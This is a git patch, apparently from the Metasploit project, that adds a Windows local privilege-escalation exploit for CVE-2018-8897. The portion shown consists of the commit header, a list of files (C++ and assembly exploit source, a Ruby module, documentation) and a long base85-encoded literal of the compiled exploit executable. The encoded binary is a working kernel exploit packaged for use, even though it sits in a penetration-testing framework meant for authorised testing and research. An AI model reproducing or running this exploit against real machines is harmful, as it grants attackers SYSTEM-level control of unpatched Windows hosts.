From 06e8cc49f5ae2f2a040c2ad7a2f2a0f2b1dbc416 Mon Sep 17 00:00:00 2001
From: Wei Chen <wei_chen@rapid7.com>
Date: Fri, 13 Jul 2018 10:54:25 -0500
Subject: [PATCH] Land #10297, Add priv escalation mod for CVE-2018-8897

---
 .../cve-2018-8897-exe/cve-2018-8897-exe.exe   | Bin 0 -> 131584 bytes
 .../modules/exploit/windows/local/mov_ss.md   |  10 +
 .../source/exploits/cve-2018-8897-exe/Error.h |  10 +
 .../cve-2018-8897-exe/KernelRoutines.h        |  66 +++
 .../source/exploits/cve-2018-8897-exe/LICENSE |  29 ++
 .../exploits/cve-2018-8897-exe/LockedMemory.h |  88 ++++
 .../exploits/cve-2018-8897-exe/Native.asm     | 146 +++++++
 .../exploits/cve-2018-8897-exe/Native.h       |  30 ++
 .../exploits/cve-2018-8897-exe/NtDefines.h    |  72 ++++
 .../exploits/cve-2018-8897-exe/README.md      |  12 +
 .../cve-2018-8897-exe/cve-2018-8897-exe.cpp   | 387 ++++++++++++++++++
 .../cve-2018-8897-exe/cve-2018-8897-exe.sln   |  22 +
 .../cve-2018-8897-exe.vcxproj                 | 160 ++++++++
 .../cve-2018-8897-exe.vcxproj.filters         |  44 ++
 modules/exploits/windows/local/mov_ss.rb      | 174 ++++++++
 15 files changed, 1250 insertions(+)
 create mode 100755 data/exploits/cve-2018-8897-exe/cve-2018-8897-exe.exe
 create mode 100644 documentation/modules/exploit/windows/local/mov_ss.md
 create mode 100644 external/source/exploits/cve-2018-8897-exe/Error.h
 create mode 100644 external/source/exploits/cve-2018-8897-exe/KernelRoutines.h
 create mode 100644 external/source/exploits/cve-2018-8897-exe/LICENSE
 create mode 100644 external/source/exploits/cve-2018-8897-exe/LockedMemory.h
 create mode 100644 external/source/exploits/cve-2018-8897-exe/Native.asm
 create mode 100644 external/source/exploits/cve-2018-8897-exe/Native.h
 create mode 100644 external/source/exploits/cve-2018-8897-exe/NtDefines.h
 create mode 100644 external/source/exploits/cve-2018-8897-exe/README.md
 create mode 100755 external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.cpp
 create mode 100755 external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.sln
 create mode 100755 external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.vcxproj
 create mode 100755 external/source/exploits/cve-2018-8897-exe/cve-2018-8897-exe.vcxproj.filters
 create mode 100644 modules/exploits/windows/local/mov_ss.rb

diff --git a/data/exploits/cve-2018-8897-exe/cve-2018-8897-exe.exe b/data/exploits/cve-2018-8897-exe/cve-2018-8897-exe.exe
new file mode 100755
index 0000000000000000000000000000000000000000..ee84f13825f7023e206d2a72850cdc2e653a5758
GIT binary patch
literal 131584
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
